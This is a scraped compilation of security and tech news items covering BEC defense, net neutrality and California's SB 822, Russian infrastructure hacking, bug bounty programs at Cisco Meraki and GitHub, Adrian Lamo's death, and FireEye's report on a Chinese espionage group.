Since socially engineered attacks such as BEC are designed to exploit human instincts and emotions, human-powered intelligence naturally plays a critical role in defending against these attacks. I’ve written previously about the limitations of so-called automated intelligence and why human expertise and analysis are irreplaceable. BEC epitomizes this notion.
After all, intelligence offerings that rely solely on automation tend to comprise little more than technical indicators of compromise (IoCs). BEC campaigns can have IoCs—but they tend to be less technical and more nuanced, often pertaining to an attacker’s syntax, dialect, or other behavioral characteristics. While an IoC for a phishing campaign, for example, might be an email address, an IoC for a BEC campaign could be the phrase an attacker uses to open or sign off the email. Automated intelligence offerings and traditional network security solutions are generally not designed to identify these types of IoCs, which is why human-powered intelligence and subject matter expertise are crucial.
User Awareness and Education Prevail
Since traditional network defense solutions alone typically aren’t sufficient countermeasures for BEC, user education—especially when shaped and informed by human-powered intelligence—is crucial. Implementing enterprise-wide efforts to raise awareness of BEC TTPs can help employees more accurately detect and report malicious emails and other socially engineered attacks.
It’s also important to consider that many users may be unaware that BEC is not only a legitimate but also very common threat capable of inflicting significant monetary damages. After all, cybersecurity-related news coverage tends to focus on state-sponsored activity and large-scale cyber attacks such as Mirai or WannaCry. It should come as no surprise that unsophisticated scams such as BEC—though widespread and damaging—are often considered far less newsworthy outside the security community.
Ultimately, the simple yet far-reaching consequences of BEC should serve as a reminder for organizations across all sectors to re-examine the role of human expertise within their security strategies. Remember that even organizations with the most robust defense solutions and advanced automated technologies cannot effectively combat threats such as BEC without the adequate support and nuanced expertise of humans.
As Americans wait to see whether net neutrality can gain enough support among lawmakers to invoke disapproval via the Congressional Review Act, individual states are not waiting -- several are working on state laws to maintain net neutrality within their own borders.
In December 2017, under the chairmanship of Ajit Pau, the FCC voted 3-2 to remove net neutrality protections by rolling back its earlier Obama-era classification of ISPs as telecommunications service providers (and therefor under FCC purview) to the common carriers as they had been previously classified. This has now happened. It simply means that existing FCC rules can no longer be applied to ISPs because they are not telecommunications services. This ruling won't come into effect until April 23; that is, 60 days after publication of the ruling in the Federal Register.
In the meantime, California has now joined the number of states attempting to preserve local net neutrality regardless of federal preferences. California state senator Scott Wiener has introduced SB 822, a comprehensive proposal that would prevent ISPs from blocking websites, throttling users' services or introducing paid priority services within California. In some ways this new bill imposes even stricter net neutrality than that being dismantled by the FCC, by, for example, imposing conditions on the practice of 'zero rating'.
Coincidentally, the communications regulator in the UK, OFCOM, this month announced investigations into service providers Vodafone and Three. Vodafone operates a zero rating option called Vodafone Passes. "Our Passes allow customers to access their favorite content without fear of running out of data or attracting out-of-bundle charges," says a Vodafone statement. "They are open to any content provider of video, music, chat and social. Twenty-two content providers have signed up so far, ensuring Vodafone customers can enjoy the widest selection of worry-free access to content across the industry."
Opponents of net neutrality claim this is good for the consumer, effectively providing free bandwidth to the user. Proponents suggest it can starve new and smaller websites of the visitors they need.
In the U.S., AT&T offers a sponsored data program that is similarly zero rated on data usage. It seems, however, that the only services actually zero rated are owned by AT&T -- such as DirecTV. This gives DirecTV a huge advantage over rival services such as Hulu and Sling, since potential customers are more likely to use the service that has a zero data cost to them.
This is the whole net neutrality argument writ small. Large, established organizations can afford to starve new innovative organizations of internet traffic by paying a premium to the service providers; and will always -- in a completely free market -- be able to buy more of the available bandwidth.
Knock-on concerns are that in order to guarantee bandwidth availability to the large premium-paying customers, it might be necessary to rein back availability to ordinary users -- and in order to encourage those ordinary users to pay more for their bandwidth, there will be a temptation for providers to throttle what is already available.
The difficulty in policing net neutrality is that lawmakers recognize that some lee-way for 'throttling' (in the form of traffic management) will always be necessary. Europe's net neutrality laws require that any such traffic management must be 'transparent, non-discriminatory and proportionate'.
OFCOM has promised an update of its investigation into Vodafone in June, and it's not possible to predict the outcome. Vodafone claims that its Passes service does not generate any bandwidth throttling, and indeed guarantees full service to the consumer. This may be true with just 22 signed up content providers; but may not necessarily be true with 200 signed up content providers.
In California, Senator Wiener's proposal solves this problem, not by banning zero-rating outright, but by allowing it only for whole classes of content provider. In the AT&T example, AT&T could continue to zero-rate DirecTV only if it also zero-rates all similar content providers including Hulu and Sling.
Without doubt, SB 822 is one of the strongest net neutrality bills yet seen; and it will undoubtedly be disliked by the ISP providers. Jamie Davies, writing in Telecoms.com, considers net neutrality to be a heavy-handed approach to bandwidth problems. "The telcos have to be given the opportunity to make money," he writes. "If the telcos are making less money, they are spending less on tackling the increased consumption of data. This is a net loss in the long-run and we do not think this is a nuance of the argument which has been considered by Weiner and his army of preachers."
SB 822 may never happen. It may not be necessary if the Congressional Review Act can be used to overturn the FCC decision; or it may fail to get enough votes in California. Ironically, however, the FCC won't be able to stop it. Back in December, the FCC barred states from adopting their own net neutrality rules -- however, it will not be able to enforce its own rule.
"While the FCC's 2017 Order explicitly bans states from adopting their own net neutrality laws," writes Barbara van Schewick, Professor of Law at Stanford Law School, "that preemption is invalid. According to case law, an agency that does not have the power to regulate does not have the power to preempt. That means the FCC can only prevent the states from adopting net neutrality protections if the FCC has authority to adopt net neutrality protections itself."
The Russian government is behind a sustained hacking effort to take over the control systems of critical US infrastructure like nuclear power plants and water distribution, according to US cyber security investigators.
A technical report released by the Department of Homeland Security on Thursday singled out Moscow as directing the ongoing effort that could give the hackers the ability to sabotage or shut down energy and other utility plants around the country.
It was the first time Washington named the Russian government as behind the attacks which have been taking place for nearly three years.
The allegation added to a series of accusations of political meddling and hacking against Russia that led to Washington announcing fresh sanctions against the country this week.
"Since at least March 2016, Russian government cyber actors... targeted government entities and multiple US critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors," the report from the DHS Computer Emergency Readiness Team said.
DHS, together with the Federal Bureau of Investigation, said the Russian hackers targeted two groups -- the infrastructure operators themselves, and also peripheral "staging targets" which could be used as stepping stone into the intended targets.
Staging targets included third party firms supplying services and support to the main targets but may have less secure networks. The hackers had a deep toolbox of methods to enter target systems, they said.
The hacking effort paralleled Russia's alleged operation to interfere with the 2016 US presidential election and continue with online media manipulation throughout 2017.
DHS did not identify specific targets which the Russians broke into. But it said they were able to monitor the behavior of control systems, install their own software, collect the credentials of authorized users, monitor communications, and create administrator accounts to run the systems.
- Sustained attack -
The government has been issuing warnings to operators of US infrastructure -- power producers and distributors, water systems, and others -- about foreign hacking since 2016.
In January a White House report said cyberattacks cost the United States between $57 billion and $109 billion in 2016, and warned that the broader economy could be hurt if the situation worsens. It pointed the finger mainly at attackers from Russia, China, Iran, and North Korea.
Last September the private security firm Symantec outlined hacking efforts focused against US and European energy systems by a high-skilled group it dubbed Dragonfly 2.0.
"The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so."
Symantec did not name the origin of the group, but the DHS report included Symantec's Dragonfly analysis in its allegations against Russia.
On Thursday the government announced sanctions against Russia's top spy agencies and more than a dozen individuals, citing both the election meddling and cyberattacks.
"We will continue to call out malicious behavior, impose costs, and build expectations for responsible actions in cyberspace," said Rob Joyce, the cybersecurity coordinator on the White House's National Security Council.
Cisco Meraki, a provider of cloud-managed IT solutions, announced last week the launch of a public bug bounty program with rewards of up to $10,000 per vulnerability.
Cisco Meraki, which resulted from Cisco’s acquisition of Meraki in late 2012, started with a private bug bounty program on the Bugcrowd platform. The private program led to the discovery of 39 flaws, for which the company paid out an average of roughly $1,100.
The firm has now decided to open its bug bounty program to all the white hat hackers on Bugcrowd and it’s prepared to pay them between $100 and $10,000 per flaw.
The initiative covers the meraki.com, ikarem.io, meraki.cisco.com and network-auth.com domains and some of their subdomains, the Meraki Dashboard mobile apps for Android and iOS, and products such as the Cisco Meraki MX Security Appliances, Meraki MS Switches, MR Access Points, MV Security Cameras, MC Phones, Systems Manager, and Virtual Security Appliances.
The highest rewards can be earned for serious vulnerabilities in websites (except meraki.cisco.com), and all hardware and software products. Researchers can receive between $6,000 and $10,000 for remote code execution, root logic, sensitive information disclosure, and device configuration hijacking issues.
There is a long list of security issues that are not covered by the program, including denial-of-service (DoS) attacks, SSL-related problems and ones that require man-in-the-middle (MitM) access, clickjacking, and classic self-XSS.
“We invest heavily in tools, processes and technologies to keep our users and their networks safe, including third party audits, features like two-factor authentication and our out-of-band cloud management architecture,” said Sean Rhea, engineering director at Cisco Meraki. “The Cisco Meraki vulnerability rewards program is an important component of our security strategy, encouraging external researchers to collaborate with our security team to help keep networks safe.”
Meraki says its wireless, switching, security, and communications products are used by more than 230,000 global customers for 3 million devices.
Adrian Lamo, the former hacker best known for breaching the systems of The New York Times and turning in Chelsea Manning to authorities, has died at age 37.
His passing was announced on Friday by his father, Mario Lamo, on the Facebook page of the 2600: The Hacker Quarterly magazine.
“With great sadness and a broken heart I have to let know all of Adrian's friends and acquaintances that he is dead. A bright mind and compassionate soul is gone, he was my beloved son…” he wrote.
Lamo had been living in Wichita, Kansas, and he was found dead in an apartment on Wednesday. The cause of death is not known, but representatives of local police said they had found nothing suspicious, The Wichita Eagle reported.
Lamo broke into the systems of companies such as Yahoo, AOL, Comcast, Microsoft and The New York Times in an effort to demonstrate that they had been vulnerable to hacker attacks.
He was arrested in 2003 and in early 2004 he pleaded guilty to computer crimes against Microsoft, The New York Times, and data analytics provider LexisNexis. He was sentenced to six months’ detention at the home of his parents.
Lamo drew criticism in 2010 after he reported Chelsea Manning (at the time U.S. Army intelligence analyst Bradley Manning) to the Army for leaking a massive amount of classified documents to WikiLeaks.
A China-related cyberespionage group that has been active for half a decade has increased its attacks on engineering and maritime entities over the past months, FireEye reports.
Referred to asLeviathan orTEMP.Periscope, the group has been historically interested in targets connected to South China Sea issues, which hasn't changed in the recently observed attacks. Targets include research institutes, academic organizations, and private firms in the United States.
“The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit,” FireEyesays.
Over the years, the group has also shown interest in professional/consulting services, high-tech industry, healthcare, and media/publishing. Most of the identified victims were in the United States, with some located in Europe and at least one in Hong Kong.
The group’s tactics, techniques, and procedures (TTPs), as well as its targets, overlap with those associated with the group called TEMP.Jumper, which in turn overlaps significantly with theNanHaiShu group.
The recently observed spike in activity also revealed the use of a broad range of malware that other suspected Chinese groups also use. These tools include backdoors, reconnaissance tools, file stealers, and webshells.
A second backdoor isBadflick, which can modify the file system, generate a reverse shell, and modify its command and control (C&C) configuration.
Another similar piece of malware isPhoto, a DLL backdoor that gets directory, file, and drive listing; creates a reverse shell; records the screen, video, and audio; lists, terminates, and creates processes; creates and modifies registry keys and values; logs keystrokes, returns usernames and passwords from protected storage; and can read, create, and modify files.
The group also usedHomefry, a 64-bit Windows password dumper/cracker previously used along with the first two backdoors. Based on received commands, it can either display cleartext credentials for each login session, or can display cleartext credentials, NTLM hashes, and malware version for each login session.
Other tools employed by the hackers includeLunchmoney (which can exfiltrate files to Dropbox) andMurkytop, a command-line reconnaissance tool (which can execute files; move and delete files; schedule remote AT jobs; perform host discovery; scan for open ports in a connected network; and retrieve information about the operating system, users, groups, and shares on remote hosts).
In recent attacks, the group was also observed employing theChina Chopper code injection webshell capable of executing Microsoft .NET code within HTTP POST commands (thus, it can upload and download files, execute applications, list directory contents, access Active Directory, access databases, and more).
Previously, the group used theBeacon backdoor (commercially available as part of theCobalt Strike software platform), and theBlackcoffee backdoor that hides C&C communication as traffic to legitimate websites such as Github and Microsoft's Technet portal.
The group has been also observed using spear phishing emails; lure documents attempting to exploitCVE-2017-11882 to drop malware; stolen code signing certificates to sign their malware;bitsadmin.exe and PowerShell to download additional tools; and Windows Management Instrumentation (WMI) and Windows Shortcut files (.lnk) for persistence.
“The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye concludes.
Git repository hosting service GitHub paid a total of $166,495 in rewards in 2017 to security researchers reporting vulnerabilities as part of its four year old bug bounty program.
Total payouts more than doubled compared to the $81,700 paid in 2016 and were nearly equal to the total bounties paid during the first three years of the program: $177,000. During the first two years of the program, the companypaid $95,300 in bug bounties.
Throughout the year, the company received a total of 840 submissions to the program, but resolved and rewarded only 121 of them (15%). In 2016, GitHub rewarded 73 of the 795 valid reports it received, with only 48 submissions being deemed high enough to appear on bug bounty program’spage.
The number of valid reports fueled the increase in total payouts and also resulted in GitHub re-evaluating its payout structure in October 2017. Thus, the bug bounties were doubled, with the minimum and maximum payouts now at $555 and $20,000.
With the program continuously growing participation by researchers, program initiatives, and the rewards paid out, 2017 proved the biggest year yet, GitHub’s Greg Osepoints out.
Last year, the company also announcedthe introduction of GitHub Enterprise to the bug bounty program, allowing researchers to find vulnerabilities in areas that may not be exposed on GitHub.com or which are specific to enterprise deployments.
“In the beginning of 2017, a number of reports impacting our enterprise authentication methods prompted us to not only focus on this internally, but also identify how we could engage researchers to focus on this functionality,” Ose notes.
He also says GitHub has launched its first researcher grant, an initiative the company has been long focused on. This effort involves paying “a fixed amount to a researcher to dig into a specific feature or area of the application.” Any discovered vulnerability would also be rewarded through the Bug Bounty program.
Last year, GitHub also rolled out private bug bounties, which allowed it to limit the impact of vulnerabilities in production. The company also rolled out internal improvements to the program, to more efficiently triage and remediate submissions and plans on refining the process in 2018 as well.
GitHub is looking to expand the initiatives that proved successful in 2017, launching more private bounties and research grants to gain focus on various features before and after they publicly launch. The company also plans additional promotions later this year.
“Given the program’s success, we’re also looking to see how we can expand its scope to help secure our production services and protect GitHub’s ecosystem. We’re excited for what’s next and look forward to triaging and fixing your submissions this year,” Ose concludes.
We have 88 guests online
You know we do!